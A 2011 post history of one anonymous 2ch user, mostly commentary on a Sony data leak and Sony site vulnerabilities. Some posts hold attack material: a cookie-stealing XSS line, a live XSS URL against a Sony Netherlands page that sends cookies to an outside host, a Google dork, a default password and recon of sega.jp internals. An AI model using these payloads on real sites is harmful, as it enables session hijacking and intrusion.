- 男「小遣い少ないから増やして」 妻「主婦業を時給に換算すると18万円だけど?」 男「・・・」
500 : 忍法帖【Lv=20,xxxPT】 (チベット自治区)[sega]:2011/05/07(土) 10:47:43.76 ID:0F0FQ5Nh0 - 妻がブスで毎日辛いです
|
- ソニー、また2500人分情報流出キタ━━━━(゚∀゚)━━━━!! 個人情報でスレ立てた俺逮捕か!?
57 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 12:07:15.80 ID:0F0FQ5Nh0 - 535 :It's@名無しさん:2011/05/07(土) 12:03:18.18
>>533
>ハッカー向け情報サイト
www
Google検索で"/bin/perl" site:sony.comを検索するだけで該当cgiのソースコードは出てくるし、
twitterで見つけられて、2chでソースコードが解読されて、xlsのurlが知られたってだけなのにwww
|
- ソニー、また2500人分情報流出キタ━━━━(゚∀゚)━━━━!! 個人情報でスレ立てた俺逮捕か!?
134 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 12:58:41.36 ID:0F0FQ5Nh0 - >>130
twitterはcgiのソースコードのurlまでで、xlsは2chが初出だったかと
|
- ソニー、また2500人分情報流出キタ━━━━(゚∀゚)━━━━!! 個人情報でスレ立てた俺逮捕か!?
143 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 13:05:06.63 ID:0F0FQ5Nh0 - >>141
時系列
はせがわようすけ氏のtwitter [2011/05/05(木) 16時あたり?]
http://slashdot.jp/~NurseAngel/journal/530511
↓
米ソニーのオンラインショップのソースコードが丸見え!? [2011/05/05(木) 18:20:32.86]
http://www.nihongodeok.net/thread/hatsukari.2ch.net/test/read.cgi/news/1304587232/
xls発見 [2011/05/05(木) 18:59:53.90]
↓
【速報】ソニー 個人情報大公開中 [2011/05/05(木) 20:05:52.73]
http://www.nihongodeok.net/thread/hatsukari.2ch.net/test/read.cgi/news/1304593552/
|
- ソニー「2chのニュー速はハッカーの交流サイト」
865 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 18:35:48.22 ID:0F0FQ5Nh0 - 我們是新速黒客wwww
|
- ソニー「2chのニュー速はハッカーの交流サイト」
882 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 18:46:51.92 ID:0F0FQ5Nh0 - >>876
Linuxをインストールすればスーパーハッカーになれるぞw
|
- 【速報】ソニーのサイトにヤバい脆弱性
63 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 19:34:21.82 ID:0F0FQ5Nh0 - マジレスするとログインサイト以外のXSSはそんなにやばくない。
ログインサイトだとXSSからクッキー盗んでセッションハイジャックできる場合があるけど。
|
- 【速報】ソニーのサイトにヤバい脆弱性
66 :63(神奈川県)[sage]:2011/05/07(土) 19:35:11.59 ID:0F0FQ5Nh0 - あ、ログインサイトだったマズいわこれ
|
- 【速報】ソニーのサイトにヤバい脆弱性
86 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 19:40:03.57 ID:0F0FQ5Nh0 - >>82
WAFを使ってないのは確かだろうねぇ
|
- 【速報】ソニーのサイトにヤバい脆弱性
115 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 19:46:55.54 ID:0F0FQ5Nh0 - >>111
アメリカには集団訴訟制度(クラスアクション)がある
日本には無い
|
- 【速報】ソニーのサイトにヤバい脆弱性
127 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 19:49:27.78 ID:0F0FQ5Nh0 - >>121
だろうなw
俺も複数のヤバいやつ見つけてIPAに報告したよw
|
- ソニーのサイトにXSS
102 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 19:58:31.43 ID:0F0FQ5Nh0 - >>95
クッキーに含まれたセッション情報を他のサーバーに投げて、セッションハイジャックができるはず。
こんな感じで: location.href = "http://example.com?c=" + document.cookie;
|
- 【速報】ソニーのサイトにヤバい脆弱性
173 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 20:03:25.05 ID:0F0FQ5Nh0 - >>149
日本のサイトは脆弱性ばっかりだからな
サイバー戦争が起きたら真っ先にやられる
|
- 【速報】ソニーのサイトにヤバい脆弱性
180 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 20:08:16.92 ID:0F0FQ5Nh0 - >>175
金にならない(乗っ取りできない)程度の脆弱性や誰かの操作が必要な脆弱性は大量に残ってる
|
- 【速報】ソニーのサイトにヤバい脆弱性
183 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 20:09:48.73 ID:0F0FQ5Nh0 - >>181
居るよ。最近だとHTTP Parameter Pollutionってのが出てきた。
|
- ソニーのサイトにXSS
127 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 20:16:40.19 ID:0F0FQ5Nh0 - >>122
%00かなんかを使っていけそうな気はするけど、シャレにならんから止めとけよw > SQLインジェクション
|
- 【速報】ソニーのサイトにヤバい脆弱性
192 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 20:18:33.54 ID:0F0FQ5Nh0 - >>190
生命は…うん、あれ、>>127
|
- 【速報】ソニーのサイトにヤバい脆弱性
202 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 20:25:00.60 ID:0F0FQ5Nh0 - >>193
去年は知らんが、日本はロシアに負けると断言できる。
中国になら勝てそうな気がするけどな。
|
- 【速報】ソニーのサイトにヤバい脆弱性
210 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 20:31:35.56 ID:0F0FQ5Nh0 - >>206
いざとなりゃ海底ケーブルの帯域絞っちゃえば良いし
|
- 【速報】ソニーのサイトにヤバい脆弱性
215 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 20:41:46.48 ID:0F0FQ5Nh0 - >>213
そういうのもできる。
けど、セッションハイジャックのが危険だと思う。
サイトにログインしていた場合、ハッカーがログイン状態を乗っとることができる。
|
- 【速報】ソニーのサイトにヤバい脆弱性
222 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 20:48:15.96 ID:0F0FQ5Nh0 - >>221
WAF入って無さげ
|
- 【速報】ソニーのサイトにヤバい脆弱性
241 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 21:03:19.51 ID:0F0FQ5Nh0 - セッションハイジャック
http://www.sonyproductinformatie.nl/main/search.php?searchfield=%3Cimg%20onerror=location.href=%26quot;http://2ch.net?%26quot;%2bdocument.cookie;%20src=http://google.com%3E&x=19&y=20
|
- 【速報】ソニーのサイトにヤバい脆弱性
247 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 21:07:38.06 ID:0F0FQ5Nh0 - chromeは動かんけど、firefox4では動いた(>>241)
chromeはurlにあるjavascriptを実行しないらしい
|
- 【速報】ソニーのサイトにヤバい脆弱性
251 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 21:10:07.38 ID:0F0FQ5Nh0 - >>249
POSTで送ればchromeの防御をbypassできるかも?
|
- 【速報】ソニーのサイトにヤバい脆弱性
257 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 21:20:26.97 ID:0F0FQ5Nh0 - >>253
日本語でおk
外部スクリプトを使うという方法もあるけど、それも防御されてるだろ流石に。試してないけど
|
- 【速報】ソニーのサイトにヤバい脆弱性
261 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 21:24:16.59 ID:0F0FQ5Nh0 - >>239
マズいんじゃね?
こんなもん見つけたけど何ぞこれ
http://sega.jp/report.html
http://sega.jp/report20091007.html
|
- 【速報】ソニーのサイトにヤバい脆弱性
269 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 21:31:10.53 ID:0F0FQ5Nh0 - >>265
txtで検索したら出てきた。
こっちはstatisticsで検索して出てきた
http://sega.jp/rrdtool/index.html
|
- 【速報】ソニーのサイトにヤバい脆弱性
273 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 21:39:16.94 ID:0F0FQ5Nh0 - >>270
うん。でも、サイト内検索のインデックスが更新されて無さげであんまり面白くないな
genindex.cgiにアクセスして再インデックス化すればいいのだけど、まぁパスワードが必要で法的に無理だからここまでかな
|
- 【速報】ソニーのサイトにヤバい脆弱性
342 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 22:21:19.95 ID:0F0FQ5Nh0 - >>337
おいバカやめろwwww
絶対書き換えるやつ出てくるからwwww
|
- 【速報】ソニーのサイトにヤバい脆弱性
349 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 22:23:07.76 ID:0F0FQ5Nh0 - >>343
そゆこと。BlackHat Japanも中止になったしな。
|
- 【速報】ソニーのサイトにヤバい脆弱性
364 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 22:32:50.75 ID:0F0FQ5Nh0 - >>358
カジュアルハックは防げるからな
BASIC認証もDIGEST認証も弱いけど
|
- 【速報】ソニーのサイトにヤバい脆弱性
370 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 22:40:26.43 ID:0F0FQ5Nh0 - >>356
リンクが無くて外部からの検索(Googleなど)では拾えないものでも、
内部からの検索では拾えるからな。
|
- 【速報】ソニーのサイトにヤバい脆弱性
385 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 22:59:30.63 ID:0F0FQ5Nh0 - >>382
>>273で書いたけど、パスワード入力が必要
|
- 【速報】ソニーのサイトにヤバい脆弱性
390 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 23:01:27.71 ID:0F0FQ5Nh0 - ちなみに標準のパスワードはこうなってる。
$g_password = "msearchpass";
けど、さすがパスワードは変更してるはず。
|
- 【速報】ソニーのサイトにヤバい脆弱性
397 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 23:09:17.60 ID:0F0FQ5Nh0 - >>391
あるあるw
|
- 【速報】ソニーのサイトにヤバい脆弱性
421 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 23:35:00.29 ID:0F0FQ5Nh0 - >>412
以前作った@china.comのアドレスで落としてみようと思ったけど、
china.comのメールサービスがログインできなくなってて諦め
|
- 【速報】ソニーのサイトにヤバい脆弱性
441 :名無しさん@涙目です。(神奈川県)[sage]:2011/05/07(土) 23:54:51.70 ID:0F0FQ5Nh0 - bgp.he.netは今サービス停止してて使えんけど、Googleキャッシュから
http://webcache.googleusercontent.com/search?q=cache:bgp.he.net/net/157.109.0.0/16
DNSクリックすると関連鯖が分かる
|